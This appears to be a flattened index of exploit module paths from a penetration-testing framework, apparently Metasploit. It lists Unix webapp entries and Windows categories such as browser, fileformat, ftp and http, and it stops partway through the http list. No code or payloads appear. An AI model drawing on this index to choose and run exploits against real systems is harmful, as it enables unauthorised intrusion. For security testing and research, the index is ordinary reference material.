exploit/unix/webapp/zeroshell_exec | exploit/unix/webapp/zimbra_lfi | exploit/unix/webapp/zoneminder_lang_exec | exploit/unix/webapp/zoneminder_packagecontrol_exec | exploit/unix/webapp/zoneminder_snapshots | exploit/unix/webapp/zpanel_username_exec | . | x11 (1) . | exploit/unix/x11/x11_keyboard_exec | . | . | windows (1193) . | antivirus (9) . | exploit/windows/antivirus/ams_hndlrsvc | exploit/windows/antivirus/ams_xfr | exploit/windows/antivirus/symantec_endpoint_manager_rce | exploit/windows/antivirus/symantec_iao | exploit/windows/antivirus/symantec_rtvscan | exploit/windows/antivirus/symantec_workspace_streaming_exec | exploit/windows/antivirus/trendmicro_serverprotect | exploit/windows/antivirus/trendmicro_serverprotect_createbinding | exploit/windows/antivirus/trendmicro_serverprotect_earthagent | . | arkeia (1) . | exploit/windows/arkeia/type77 | . | backdoor (1) . | exploit/windows/backdoor/energizer_duo_payload | . | backupexec (3) . | exploit/windows/backupexec/name_service | exploit/windows/backupexec/remote_agent | exploit/windows/backupexec/ssl_uaf | . | brightstor (19) . | exploit/windows/brightstor/ca_arcserve_342 | exploit/windows/brightstor/discovery_tcp | exploit/windows/brightstor/discovery_udp | exploit/windows/brightstor/etrust_itm_alert | exploit/windows/brightstor/hsmserver | exploit/windows/brightstor/lgserver | exploit/windows/brightstor/lgserver_multi | exploit/windows/brightstor/lgserver_rxrlogin | exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter | exploit/windows/brightstor/lgserver_rxsuselicenseini | exploit/windows/brightstor/license_gcr | exploit/windows/brightstor/mediasrv_sunrpc | exploit/windows/brightstor/message_engine | exploit/windows/brightstor/message_engine_72 | exploit/windows/brightstor/message_engine_heap | exploit/windows/brightstor/sql_agent | exploit/windows/brightstor/tape_engine | exploit/windows/brightstor/tape_engine_0x8a | exploit/windows/brightstor/universal_agent | . | browser (246) . | exploit/windows/browser/adobe_cooltype_sing | exploit/windows/browser/adobe_flash_avm2 | exploit/windows/browser/adobe_flash_casi32_int_overflow | exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array | exploit/windows/browser/adobe_flash_domain_memory_uaf | exploit/windows/browser/adobe_flash_filters_type_confusion | exploit/windows/browser/adobe_flash_mp4_cprt | exploit/windows/browser/adobe_flash_otf_font | exploit/windows/browser/adobe_flash_pcre | exploit/windows/browser/adobe_flash_regex_value | exploit/windows/browser/adobe_flash_rtmp | exploit/windows/browser/adobe_flash_sps | exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized | exploit/windows/browser/adobe_flash_worker_byte_array_uaf | exploit/windows/browser/adobe_flashplayer_arrayindexing | exploit/windows/browser/adobe_flashplayer_avm | exploit/windows/browser/adobe_flashplayer_flash10o | exploit/windows/browser/adobe_flashplayer_newfunction | exploit/windows/browser/adobe_flatedecode_predictor02 | exploit/windows/browser/adobe_geticon | exploit/windows/browser/adobe_jbig2decode | exploit/windows/browser/adobe_media_newplayer | exploit/windows/browser/adobe_shockwave_rcsl_corruption | exploit/windows/browser/adobe_toolbutton | exploit/windows/browser/adobe_utilprintf | exploit/windows/browser/advantech_webaccess_dvs_getcolor | exploit/windows/browser/aim_goaway | exploit/windows/browser/aladdin_choosefilepath_bof | exploit/windows/browser/amaya_bdo | exploit/windows/browser/aol_ampx_convertfile | exploit/windows/browser/aol_icq_downloadagent | exploit/windows/browser/apple_itunes_playlist | exploit/windows/browser/apple_quicktime_marshaled_punk | exploit/windows/browser/apple_quicktime_mime_type | exploit/windows/browser/apple_quicktime_rdrf | exploit/windows/browser/apple_quicktime_rtsp | exploit/windows/browser/apple_quicktime_smil_debug | exploit/windows/browser/apple_quicktime_texml_font_table | exploit/windows/browser/ask_shortformat | exploit/windows/browser/asus_net4switch_ipswcom | exploit/windows/browser/athocgov_completeinstallation | exploit/windows/browser/autodesk_idrop | exploit/windows/browser/aventail_epi_activex | exploit/windows/browser/awingsoft_web3d_bof | exploit/windows/browser/awingsoft_winds3d_sceneurl | exploit/windows/browser/baofeng_storm_onbeforevideodownload | exploit/windows/browser/barcode_ax49 | exploit/windows/browser/blackice_downloadimagefileurl | exploit/windows/browser/c6_messenger_downloaderactivex | exploit/windows/browser/ca_brightstor_addcolumn | exploit/windows/browser/chilkat_crypt_writefile | exploit/windows/browser/chrome_filereader_uaf | exploit/windows/browser/cisco_anyconnect_exec | exploit/windows/browser/cisco_playerpt_setsource | exploit/windows/browser/cisco_playerpt_setsource_surl | exploit/windows/browser/cisco_webex_ext | exploit/windows/browser/citrix_gateway_actx | exploit/windows/browser/clear_quest_cqole | exploit/windows/browser/communicrypt_mail_activex | exploit/windows/browser/creative_software_cachefolder | exploit/windows/browser/crystal_reports_printcontrol | exploit/windows/browser/dell_webcam_crazytalk | exploit/windows/browser/dxstudio_player_exec | exploit/windows/browser/ea_checkrequirements | exploit/windows/browser/ebook_flipviewer_fviewerloading | exploit/windows/browser/enjoysapgui_comp_download | exploit/windows/browser/enjoysapgui_preparetoposthtml | exploit/windows/browser/exodus | exploit/windows/browser/facebook_extractiptc | exploit/windows/browser/firefox_smil_uaf | exploit/windows/browser/foxit_reader_plugin_url_bof | exploit/windows/browser/getgodm_http_response_bof | exploit/windows/browser/gom_openurl | exploit/windows/browser/greendam_url | exploit/windows/browser/honeywell_hscremotedeploy_exec | exploit/windows/browser/honeywell_tema_exec | exploit/windows/browser/hp_alm_xgo_setshapenodetype_exec | exploit/windows/browser/hp_easy_printer_care_xmlcachemgr | exploit/windows/browser/hp_easy_printer_care_xmlsimpleaccessor | exploit/windows/browser/hp_loadrunner_addfile | exploit/windows/browser/hp_loadrunner_addfolder | exploit/windows/browser/hp_loadrunner_writefilebinary | exploit/windows/browser/hp_loadrunner_writefilestring | exploit/windows/browser/hpmqc_progcolor | exploit/windows/browser/hyleos_chemviewx_activex | exploit/windows/browser/ibm_spss_c1sizer | exploit/windows/browser/ibm_tivoli_pme_activex_bof | exploit/windows/browser/ibmegath_getxmlvalue | exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule | exploit/windows/browser/ie_cbutton_uaf | exploit/windows/browser/ie_cgenericelement_uaf | exploit/windows/browser/ie_createobject | exploit/windows/browser/ie_execcommand_uaf | exploit/windows/browser/ie_iscomponentinstalled | exploit/windows/browser/ie_setmousecapture_uaf | exploit/windows/browser/ie_unsafe_scripting | exploit/windows/browser/imgeviewer_tifmergemultifiles | exploit/windows/browser/indusoft_issymbol_internationalseparator | exploit/windows/browser/inotes_dwa85w_bof | exploit/windows/browser/intrust_annotatex_add | exploit/windows/browser/java_basicservice_impl | exploit/windows/browser/java_cmm | exploit/windows/browser/java_codebase_trust | exploit/windows/browser/java_docbase_bof | exploit/windows/browser/java_mixer_sequencer | exploit/windows/browser/java_ws_arginject_altjvm | exploit/windows/browser/java_ws_double_quote | exploit/windows/browser/java_ws_vmargs | exploit/windows/browser/juniper_sslvpn_ive_setupdll | exploit/windows/browser/kazaa_altnet_heap | exploit/windows/browser/keyhelp_launchtripane_exec | exploit/windows/browser/logitechvideocall_start | exploit/windows/browser/lpviewer_url | exploit/windows/browser/macrovision_downloadandexecute | exploit/windows/browser/macrovision_unsafe | exploit/windows/browser/malwarebytes_update_exec | exploit/windows/browser/maxthon_history_xcs | exploit/windows/browser/mcafee_mcsubmgr_vsprintf | exploit/windows/browser/mcafee_mvt_exec | exploit/windows/browser/mcafeevisualtrace_tracetarget | exploit/windows/browser/mirc_irc_url | exploit/windows/browser/mozilla_attribchildremoved | exploit/windows/browser/mozilla_firefox_onreadystatechange | exploit/windows/browser/mozilla_firefox_xmlserializer | exploit/windows/browser/mozilla_interleaved_write | exploit/windows/browser/mozilla_mchannel | exploit/windows/browser/mozilla_nssvgvalue | exploit/windows/browser/mozilla_nstreerange | exploit/windows/browser/mozilla_reduceright | exploit/windows/browser/ms03_020_ie_objecttype | exploit/windows/browser/ms05_054_onload | exploit/windows/browser/ms06_001_wmf_setabortproc | exploit/windows/browser/ms06_013_createtextrange | exploit/windows/browser/ms06_055_vml_method | exploit/windows/browser/ms06_057_webview_setslice | exploit/windows/browser/ms06_067_keyframe | exploit/windows/browser/ms06_071_xml_core | exploit/windows/browser/ms07_017_ani_loadimage_chunksize | exploit/windows/browser/ms08_041_snapshotviewer | exploit/windows/browser/ms08_053_mediaencoder | exploit/windows/browser/ms08_070_visual_studio_msmask | exploit/windows/browser/ms08_078_xml_corruption | exploit/windows/browser/ms09_002_memory_corruption | exploit/windows/browser/ms09_043_owc_htmlurl | exploit/windows/browser/ms09_043_owc_msdso | exploit/windows/browser/ms09_072_style_object | exploit/windows/browser/ms10_002_aurora | exploit/windows/browser/ms10_002_ie_object | exploit/windows/browser/ms10_018_ie_behaviors | exploit/windows/browser/ms10_018_ie_tabular_activex | exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 | exploit/windows/browser/ms10_026_avi_nsamplespersec | exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec | exploit/windows/browser/ms10_046_shortcut_icon_dllloader | exploit/windows/browser/ms10_090_ie_css_clip | exploit/windows/browser/ms11_003_ie_css_import | exploit/windows/browser/ms11_050_mshtml_cobjectelement | exploit/windows/browser/ms11_081_option | exploit/windows/browser/ms11_093_ole32 | exploit/windows/browser/ms12_004_midi | exploit/windows/browser/ms12_037_ie_colspan | exploit/windows/browser/ms12_037_same_id | exploit/windows/browser/ms13_009_ie_slayoutrun_uaf | exploit/windows/browser/ms13_022_silverlight_script_object | exploit/windows/browser/ms13_037_svg_dashstyle | exploit/windows/browser/ms13_055_canchor | exploit/windows/browser/ms13_059_cflatmarkuppointer | exploit/windows/browser/ms13_069_caret | exploit/windows/browser/ms13_080_cdisplaypointer | exploit/windows/browser/ms13_090_cardspacesigninhelper | exploit/windows/browser/ms14_012_cmarkup_uaf | exploit/windows/browser/ms14_012_textrange | exploit/windows/browser/ms14_064_ole_code_execution | exploit/windows/browser/ms16_051_vbscript | exploit/windows/browser/msvidctl_mpeg2 | exploit/windows/browser/mswhale_checkforupdates | exploit/windows/browser/msxml_get_definition_code_exec | exploit/windows/browser/nctaudiofile2_setformatlikesample | exploit/windows/browser/nis2004_antispam | exploit/windows/browser/nis2004_get | exploit/windows/browser/notes_handler_cmdinject | exploit/windows/browser/novell_groupwise_gwcls1_actvx | exploit/windows/browser/novelliprint_callbackurl | exploit/windows/browser/novelliprint_datetime | exploit/windows/browser/novelliprint_executerequest | exploit/windows/browser/novelliprint_executerequest_dbg | exploit/windows/browser/novelliprint_getdriversettings | exploit/windows/browser/novelliprint_getdriversettings_2 | exploit/windows/browser/novelliprint_target_frame | exploit/windows/browser/ntr_activex_check_bof | exploit/windows/browser/ntr_activex_stopmodule | exploit/windows/browser/oracle_autovue_setmarkupmode | exploit/windows/browser/oracle_dc_submittoexpress | exploit/windows/browser/oracle_webcenter_checkoutandopen | exploit/windows/browser/orbit_connecting | exploit/windows/browser/ovftool_format_string | exploit/windows/browser/pcvue_func | exploit/windows/browser/persits_xupload_traversal | exploit/windows/browser/quickr_qp2_bof | exploit/windows/browser/real_arcade_installerdlg | exploit/windows/browser/realplayer_cdda_uri | exploit/windows/browser/realplayer_console | exploit/windows/browser/realplayer_import | exploit/windows/browser/realplayer_qcp | exploit/windows/browser/realplayer_smil | exploit/windows/browser/roxio_cineplayer | exploit/windows/browser/safari_xslt_output | exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof | exploit/windows/browser/samsung_security_manager_put | exploit/windows/browser/sapgui_saveviewtosessionfile | exploit/windows/browser/siemens_solid_edge_selistctrlx | exploit/windows/browser/softartisans_getdrivename | exploit/windows/browser/sonicwall_addrouteentry | exploit/windows/browser/symantec_altirisdeployment_downloadandinstall | exploit/windows/browser/symantec_altirisdeployment_runcmd | exploit/windows/browser/symantec_appstream_unsafe | exploit/windows/browser/symantec_backupexec_pvcalendar | exploit/windows/browser/symantec_consoleutilities_browseandsavefile | exploit/windows/browser/synactis_connecttosynactis_bof | exploit/windows/browser/systemrequirementslab_unsafe | exploit/windows/browser/teechart_pro | exploit/windows/browser/tom_sawyer_tsgetx71ex552 | exploit/windows/browser/trendmicro_extsetowner | exploit/windows/browser/trendmicro_officescan | exploit/windows/browser/tumbleweed_filetransfer | exploit/windows/browser/ubisoft_uplay_cmd_exec | exploit/windows/browser/ultramjcam_openfiledig_bof | exploit/windows/browser/ultraoffice_httpupload | exploit/windows/browser/verypdf_pdfview | exploit/windows/browser/viscom_movieplayer_drawtext | exploit/windows/browser/vlc_amv | exploit/windows/browser/vlc_mms_bof | exploit/windows/browser/webdav_dll_hijacker | exploit/windows/browser/webex_ucf_newobject | exploit/windows/browser/wellintech_kingscada_kxclientdownload | exploit/windows/browser/winamp_playlist_unc | exploit/windows/browser/winamp_ultravox | exploit/windows/browser/windvd7_applicationtype | exploit/windows/browser/winzip_fileview | exploit/windows/browser/wmi_admintools | exploit/windows/browser/x360_video_player_set_text_bof | exploit/windows/browser/xmplay_asx | exploit/windows/browser/yahoomessenger_fvcom | exploit/windows/browser/yahoomessenger_server | exploit/windows/browser/zenturiprogramchecker_unsafe | exploit/windows/browser/zenworks_helplauncher_exec | . | dcerpc (5) . | exploit/windows/dcerpc/cve_2021_1675_printnightmare | exploit/windows/dcerpc/ms03_026_dcom | exploit/windows/dcerpc/ms05_017_msmq | exploit/windows/dcerpc/ms07_029_msdns_zonename | exploit/windows/dcerpc/ms07_065_msmq | . | email (3) . | exploit/windows/email/ms07_017_ani_loadimage_chunksize | exploit/windows/email/ms10_045_outlook_ref_only | exploit/windows/email/ms10_045_outlook_ref_resolve | . | emc (4) . | exploit/windows/emc/alphastor_agent | exploit/windows/emc/alphastor_device_manager_exec | exploit/windows/emc/networker_format_string | exploit/windows/emc/replication_manager_exec | . | fileformat (189) . | exploit/windows/fileformat/a_pdf_wav_to_mp3 | exploit/windows/fileformat/abbs_amp_lst | exploit/windows/fileformat/acdsee_fotoslate_string | exploit/windows/fileformat/acdsee_xpm | exploit/windows/fileformat/actfax_import_users_bof | exploit/windows/fileformat/activepdf_webgrabber | exploit/windows/fileformat/adobe_collectemailinfo | exploit/windows/fileformat/adobe_cooltype_sing | exploit/windows/fileformat/adobe_flashplayer_button | exploit/windows/fileformat/adobe_flashplayer_newfunction | exploit/windows/fileformat/adobe_flatedecode_predictor02 | exploit/windows/fileformat/adobe_geticon | exploit/windows/fileformat/adobe_illustrator_v14_eps | exploit/windows/fileformat/adobe_jbig2decode | exploit/windows/fileformat/adobe_libtiff | exploit/windows/fileformat/adobe_media_newplayer | exploit/windows/fileformat/adobe_pdf_embedded_exe | exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs | exploit/windows/fileformat/adobe_reader_u3d | exploit/windows/fileformat/adobe_toolbutton | exploit/windows/fileformat/adobe_u3d_meshdecl | exploit/windows/fileformat/adobe_utilprintf | exploit/windows/fileformat/allplayer_m3u_bof | exploit/windows/fileformat/altap_salamander_pdb | exploit/windows/fileformat/aol_desktop_linktag | exploit/windows/fileformat/aol_phobos_bof | exploit/windows/fileformat/apple_quicktime_pnsize | exploit/windows/fileformat/apple_quicktime_rdrf | exploit/windows/fileformat/apple_quicktime_texml | exploit/windows/fileformat/audio_coder_m3u | exploit/windows/fileformat/audio_wkstn_pls | exploit/windows/fileformat/audiotran_pls | exploit/windows/fileformat/audiotran_pls_1424 | exploit/windows/fileformat/aviosoft_plf_buf | exploit/windows/fileformat/bacnet_csv | exploit/windows/fileformat/beetel_netconfig_ini_bof | exploit/windows/fileformat/blazedvd_hdtv_bof | exploit/windows/fileformat/blazedvd_plf | exploit/windows/fileformat/boxoft_wav_to_mp3 | exploit/windows/fileformat/bpftp_client_bps_bof | exploit/windows/fileformat/bsplayer_m3u | exploit/windows/fileformat/ca_cab | exploit/windows/fileformat/cain_abel_4918_rdp | exploit/windows/fileformat/ccmplayer_m3u_bof | exploit/windows/fileformat/chasys_draw_ies_bmp_bof | exploit/windows/fileformat/coolpdf_image_stream_bof | exploit/windows/fileformat/corelpdf_fusion_bof | exploit/windows/fileformat/csound_getnum_bof | exploit/windows/fileformat/cutezip_bof | exploit/windows/fileformat/cve_2017_8464_lnk_rce | exploit/windows/fileformat/cyberlink_lpp_bof | exploit/windows/fileformat/cyberlink_p2g_bof | exploit/windows/fileformat/cytel_studio_cy3 | exploit/windows/fileformat/deepburner_path | exploit/windows/fileformat/destinymediaplayer16 | exploit/windows/fileformat/digital_music_pad_pls | exploit/windows/fileformat/djstudio_pls_bof | exploit/windows/fileformat/djvu_imageurl | exploit/windows/fileformat/documalis_pdf_editor_and_scanner | exploit/windows/fileformat/dupscout_xml | exploit/windows/fileformat/dvdx_plf_bof | exploit/windows/fileformat/easycdda_pls_bof | exploit/windows/fileformat/emc_appextender_keyworks | exploit/windows/fileformat/erdas_er_viewer_bof | exploit/windows/fileformat/erdas_er_viewer_rf_report_error | exploit/windows/fileformat/esignal_styletemplate_bof | exploit/windows/fileformat/etrust_pestscan | exploit/windows/fileformat/ezip_wizard_bof | exploit/windows/fileformat/fatplayer_wav | exploit/windows/fileformat/fdm_torrent | exploit/windows/fileformat/feeddemon_opml | exploit/windows/fileformat/foxit_reader_filewrite | exploit/windows/fileformat/foxit_reader_launch | exploit/windows/fileformat/foxit_reader_uaf | exploit/windows/fileformat/foxit_title_bof | exploit/windows/fileformat/free_mp3_ripper_wav | exploit/windows/fileformat/galan_fileformat_bof | exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634 | exploit/windows/fileformat/gsm_sim | exploit/windows/fileformat/gta_samp | exploit/windows/fileformat/hhw_hhp_compiledfile_bof | exploit/windows/fileformat/hhw_hhp_contentfile_bof | exploit/windows/fileformat/hhw_hhp_indexfile_bof | exploit/windows/fileformat/homm3_h3m | exploit/windows/fileformat/ht_mp3player_ht3_bof | exploit/windows/fileformat/ibm_forms_viewer_fontname | exploit/windows/fileformat/ibm_pcm_ws | exploit/windows/fileformat/icofx_bof | exploit/windows/fileformat/ideal_migration_ipj | exploit/windows/fileformat/iftp_schedule_bof | exploit/windows/fileformat/irfanview_jpeg2000_bof | exploit/windows/fileformat/ispvm_xcf_ispxcf | exploit/windows/fileformat/kingview_kingmess_kvl | exploit/windows/fileformat/lattice_pac_bof | exploit/windows/fileformat/lotusnotes_lzh | exploit/windows/fileformat/magix_musikmaker_16_mmm | exploit/windows/fileformat/mcafee_hercules_deletesnapshot | exploit/windows/fileformat/mcafee_showreport_exec | exploit/windows/fileformat/mediacoder_m3u | exploit/windows/fileformat/mediajukebox | exploit/windows/fileformat/microp_mppl | exploit/windows/fileformat/microsoft_windows_contact | exploit/windows/fileformat/millenium_mp3_pls | exploit/windows/fileformat/mini_stream_pls_bof | exploit/windows/fileformat/mjm_coreplayer2011_s3m | exploit/windows/fileformat/mjm_quickplayer_s3m | exploit/windows/fileformat/moxa_mediadbplayback | exploit/windows/fileformat/mplayer_m3u_bof | exploit/windows/fileformat/mplayer_sami_bof | exploit/windows/fileformat/ms09_067_excel_featheader | exploit/windows/fileformat/ms10_004_textbytesatom | exploit/windows/fileformat/ms10_038_excel_obj_bof | exploit/windows/fileformat/ms10_087_rtf_pfragments_bof | exploit/windows/fileformat/ms11_006_createsizeddibsection | exploit/windows/fileformat/ms11_021_xlb_bof | exploit/windows/fileformat/ms12_005 | exploit/windows/fileformat/ms12_027_mscomctl_bof | exploit/windows/fileformat/ms13_071_theme | exploit/windows/fileformat/ms14_017_rtf | exploit/windows/fileformat/ms14_060_sandworm | exploit/windows/fileformat/ms14_064_packager_python | exploit/windows/fileformat/ms14_064_packager_run_as_admin | exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader | exploit/windows/fileformat/ms15_100_mcl_exe | exploit/windows/fileformat/ms_visual_basic_vbp | exploit/windows/fileformat/mswin_tiff_overflow | exploit/windows/fileformat/msworks_wkspictureinterface | exploit/windows/fileformat/mymp3player_m3u | exploit/windows/fileformat/netop | exploit/windows/fileformat/nitro_reader_jsapi | exploit/windows/fileformat/nuance_pdf_launch_overflow | exploit/windows/fileformat/office_dde_delivery | exploit/windows/fileformat/office_excel_slk | exploit/windows/fileformat/office_ms17_11882 | exploit/windows/fileformat/office_ole_multiple_dll_hijack | exploit/windows/fileformat/office_word_hta | exploit/windows/fileformat/openoffice_ole | exploit/windows/fileformat/orbit_download_failed_bof | exploit/windows/fileformat/orbital_viewer_orb | exploit/windows/fileformat/ovf_format_string | exploit/windows/fileformat/proshow_cellimage_bof | exploit/windows/fileformat/proshow_load_bof | exploit/windows/fileformat/publishit_pui | exploit/windows/fileformat/real_networks_netzip_bof | exploit/windows/fileformat/real_player_url_property_bof | exploit/windows/fileformat/realplayer_ver_attribute_bof | exploit/windows/fileformat/safenet_softremote_groupname | exploit/windows/fileformat/sascam_get | exploit/windows/fileformat/scadaphone_zip | exploit/windows/fileformat/shadow_stream_recorder_bof | exploit/windows/fileformat/shaper_pdf_bof | exploit/windows/fileformat/somplplayer_m3u | exploit/windows/fileformat/subtitle_processor_m3u_bof | exploit/windows/fileformat/syncbreeze_xml | exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof | exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146 | exploit/windows/fileformat/total_video_player_ini_bof | exploit/windows/fileformat/tugzip | exploit/windows/fileformat/ultraiso_ccd | exploit/windows/fileformat/ultraiso_cue | exploit/windows/fileformat/ursoft_w32dasm | exploit/windows/fileformat/varicad_dwb | exploit/windows/fileformat/videocharge_studio | exploit/windows/fileformat/videolan_tivo | exploit/windows/fileformat/videospirit_visprj | exploit/windows/fileformat/visio_dxf_bof | exploit/windows/fileformat/visiwave_vwr_type | exploit/windows/fileformat/vlc_mkv | exploit/windows/fileformat/vlc_modplug_s3m | exploit/windows/fileformat/vlc_realtext | exploit/windows/fileformat/vlc_smb_uri | exploit/windows/fileformat/vlc_webm | exploit/windows/fileformat/vuplayer_cue | exploit/windows/fileformat/vuplayer_m3u | exploit/windows/fileformat/watermark_master | exploit/windows/fileformat/winamp_maki_bof | exploit/windows/fileformat/winrar_ace | exploit/windows/fileformat/winrar_cve_2023_38831 | exploit/windows/fileformat/winrar_name_spoofing | exploit/windows/fileformat/wireshark_mpeg_overflow | exploit/windows/fileformat/wireshark_packet_dect | exploit/windows/fileformat/wm_downloader_m3u | exploit/windows/fileformat/word_msdtjs_rce | exploit/windows/fileformat/word_mshtml_rce | exploit/windows/fileformat/xenorate_xpl_bof | exploit/windows/fileformat/xion_m3u_sehbof | exploit/windows/fileformat/xradio_xrl_sehbof | exploit/windows/fileformat/zahir_enterprise_plus_csv | exploit/windows/fileformat/zinfaudioplayer221_pls | . | firewall (2) . | exploit/windows/firewall/blackice_pam_icq | exploit/windows/firewall/kerio_auth | . | ftp (65) . | exploit/windows/ftp/32bitftp_list_reply | exploit/windows/ftp/3cdaemon_ftp_user | exploit/windows/ftp/aasync_list_reply | exploit/windows/ftp/ability_server_stor | exploit/windows/ftp/absolute_ftp_list_bof | exploit/windows/ftp/ayukov_nftp | exploit/windows/ftp/bison_ftp_bof | exploit/windows/ftp/cesarftp_mkd | exploit/windows/ftp/comsnd_ftpd_fmtstr | exploit/windows/ftp/dreamftp_format | exploit/windows/ftp/easyfilesharing_pass | exploit/windows/ftp/easyftp_cwd_fixret | exploit/windows/ftp/easyftp_list_fixret | exploit/windows/ftp/easyftp_mkd_fixret | exploit/windows/ftp/filecopa_list_overflow | exploit/windows/ftp/filewrangler_list_reply | exploit/windows/ftp/freefloatftp_user | exploit/windows/ftp/freefloatftp_wbem | exploit/windows/ftp/freeftpd_pass | exploit/windows/ftp/freeftpd_user | exploit/windows/ftp/ftpgetter_pwd_reply | exploit/windows/ftp/ftppad_list_reply | exploit/windows/ftp/ftpshell51_pwd_reply | exploit/windows/ftp/ftpshell_cli_bof | exploit/windows/ftp/ftpsynch_list_reply | exploit/windows/ftp/gekkomgr_list_reply | exploit/windows/ftp/globalscapeftp_input | exploit/windows/ftp/goldenftp_pass_bof | exploit/windows/ftp/httpdx_tolog_format | exploit/windows/ftp/kmftp_utility_cwd | exploit/windows/ftp/labf_nfsaxe | exploit/windows/ftp/leapftp_list_reply | exploit/windows/ftp/leapftp_pasv_reply | exploit/windows/ftp/ms09_053_ftpd_nlst | exploit/windows/ftp/netterm_netftpd_user | exploit/windows/ftp/odin_list_reply | exploit/windows/ftp/open_ftpd_wbem | exploit/windows/ftp/oracle9i_xdb_ftp_pass | exploit/windows/ftp/oracle9i_xdb_ftp_unlock | exploit/windows/ftp/pcman_put | exploit/windows/ftp/pcman_stor | exploit/windows/ftp/proftp_banner | exploit/windows/ftp/quickshare_traversal_write | exploit/windows/ftp/ricoh_dl_bof | exploit/windows/ftp/sami_ftpd_list | exploit/windows/ftp/sami_ftpd_user | exploit/windows/ftp/sasser_ftpd_port | exploit/windows/ftp/scriptftp_list | exploit/windows/ftp/seagull_list_reply | exploit/windows/ftp/servu_chmod | exploit/windows/ftp/servu_mdtm | exploit/windows/ftp/slimftpd_list_concat | exploit/windows/ftp/trellian_client_pasv | exploit/windows/ftp/turboftp_port | exploit/windows/ftp/vermillion_ftpd_port | exploit/windows/ftp/warftpd_165_pass | exploit/windows/ftp/warftpd_165_user | exploit/windows/ftp/wftpd_size | exploit/windows/ftp/winaxe_server_ready | exploit/windows/ftp/wing_ftp_admin_exec | exploit/windows/ftp/wsftp_server_503_mkd | exploit/windows/ftp/wsftp_server_505_xmd5 | exploit/windows/ftp/xftp_client_pwd | exploit/windows/ftp/xlink_client | exploit/windows/ftp/xlink_server | . | games (3) . | exploit/windows/games/mohaa_getinfo | exploit/windows/games/racer_503beta5 | exploit/windows/games/ut2004_secure | . | http (219) . | exploit/windows/http/adobe_robohelper_authbypass | exploit/windows/http/advantech_iview_networkservlet_cmd_inject | exploit/windows/http/advantech_iview_unauth_rce | exploit/windows/http/ajaxpro_deserialization_rce | exploit/windows/http/altn_securitygateway | exploit/windows/http/altn_webadmin | exploit/windows/http/amlibweb_webquerydll_app | exploit/windows/http/apache_activemq_traversal_upload | exploit/windows/http/apache_chunked | exploit/windows/http/apache_mod_rewrite_ldap | exploit/windows/http/apache_modjk_overflow | exploit/windows/http/apache_tika_jp2_jscript | exploit/windows/http/avaya_ccr_imageupload_exec | exploit/windows/http/badblue_ext_overflow | exploit/windows/http/badblue_passthru | exploit/windows/http/bea_weblogic_jsessionid | exploit/windows/http/bea_weblogic_post_bof | exploit/windows/http/bea_weblogic_transfer_encoding | exploit/windows/http/belkin_bulldog | exploit/windows/http/ca_arcserve_rpc_authbypass | exploit/windows/http/ca_igateway_debug | exploit/windows/http/ca_totaldefense_regeneratereports | exploit/windows/http/cayin_xpost_sql_rce | exploit/windows/http/cogent_datahub_command | exploit/windows/http/cogent_datahub_request_headers_bof | exploit/windows/http/coldfusion_fckeditor | exploit/windows/http/cyclope_ess_sqli | exploit/windows/http/desktopcentral_deserialization | exploit/windows/http/desktopcentral_file_upload | exploit/windows/http/desktopcentral_statusupdate_upload | exploit/windows/http/disk_pulse_enterprise_bof | exploit/windows/http/disk_pulse_enterprise_get | exploit/windows/http/diskboss_get_bof | exploit/windows/http/disksavvy_get_bof | exploit/windows/http/disksorter_bof | exploit/windows/http/dlink_central_wifimanager_rce | exploit/windows/http/dnn_cookie_deserialization_rce | exploit/windows/http/dup_scout_enterprise_login_bof | exploit/windows/http/dupscts_bof | exploit/windows/http/easychatserver_seh | exploit/windows/http/easyfilesharing_post | exploit/windows/http/easyfilesharing_seh | exploit/windows/http/easyftp_list | exploit/windows/http/edirectory_host | exploit/windows/http/edirectory_imonitor | exploit/windows/http/efs_easychatserver_username | exploit/windows/http/efs_fmws_userid_bof | exploit/windows/http/ektron_xslt_exec | exploit/windows/http/ektron_xslt_exec_ws | exploit/windows/http/ericom_access_now_bof | exploit/windows/http/exchange_chainedserializationbinder_rce | exploit/windows/http/exchange_ecp_dlp_policy | exploit/windows/http/exchange_ecp_viewstate | exploit/windows/http/exchange_proxylogon_rce | exploit/windows/http/exchange_proxynotshell_rce | exploit/windows/http/exchange_proxyshell_rce | exploit/windows/http/ezserver_http | exploit/windows/http/fdm_auth_header | exploit/windows/http/file_sharing_wizard_seh | exploit/windows/http/flexdotnetcms_upload_exec | exploit/windows/http/forticlient_ems_fctid_sqli | exploit/windows/http/fortilogger_arbitrary_fileupload | exploit/windows/http/generic_http_dll_injection | exploit/windows/http/geutebrueck_gcore_x64_rce_bo | exploit/windows/http/git_lfs_rce | exploit/windows/http/gitstack_rce | exploit/windows/http/hp_autopass_license_traversal | exploit/windows/http/hp_imc_bims_upload | exploit/windows/http/hp_imc_java_deserialize | exploit/windows/http/hp_imc_mibfileupload | exploit/windows/http/hp_loadrunner_copyfiletoserver | exploit/windows/http/hp_mpa_job_acct | exploit/windows/http/hp_nnm_getnnmdata_hostname | exploit/windows/http/hp_nnm_getnnmdata_icount | exploit/windows/http/hp_nnm_getnnmdata_maxage | exploit/windows/http/hp_nnm_nnmrptconfig_nameparams | exploit/windows/http/hp_nnm_nnmrptconfig_schdparams | exploit/windows/http/hp_nnm_openview5 | exploit/windows/http/hp_nnm_ovalarm_lang | exploit/windows/http/hp_nnm_ovas | exploit/windows/http/hp_nnm_ovbuildpath_textfile | exploit/windows/http/hp_nnm_ovwebhelp | exploit/windows/http/hp_nnm_ovwebsnmpsrv_main | exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil | exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro | exploit/windows/http/hp_nnm_snmp | exploit/windows/http/hp_nnm_snmpviewer_actapp | exploit/windows/http/hp_nnm_toolbar_01 | exploit/windows/http/hp_nnm_toolbar_02 | exploit/windows/http/hp_nnm_webappmon_execvp | exploit/windows/http/hp_nnm_webappmon_ovjavalocale | exploit/windows/http/hp_openview_insight_backdoor | 